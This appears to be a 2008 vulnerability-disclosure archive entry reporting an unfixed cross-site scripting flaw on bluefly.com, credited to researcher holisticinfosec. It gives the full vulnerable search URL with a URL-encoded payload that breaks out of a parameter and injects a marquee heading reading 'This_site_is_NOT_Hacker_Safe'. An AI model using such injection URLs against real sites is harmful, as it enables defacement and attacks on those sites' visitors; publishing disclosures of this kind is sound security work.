Security researcher holisticinfosec submitted a cross-site scripting (XSS) vulnerability affecting bluefly.com on 25/03/2008. At the time of submission, the site ranked 7399 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 12/04/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Vulnerable URL: http://bluefly.com/pages/search/results.jsp;jsessionid=HobzrIuDooFLT816iLxdtGnDM7WKJS0Yi2cxSAoDccvh1uMrkUyV!-893005850!app19.l3.bluefly.com!7005!7002?cmSrch=true&Ne=500000&Ntk=all&Ntx=mode+matchallpartial&N=933&Ntt=test&FOLDER%3C%3Efolder_id=%22%3E%3Cmarquee%3E%3Ch%31%3EThis_site_is_NOT_Hacker_Safe%3C%2Fh%31%3E%3C%2Fmarquee%3E&inicat=933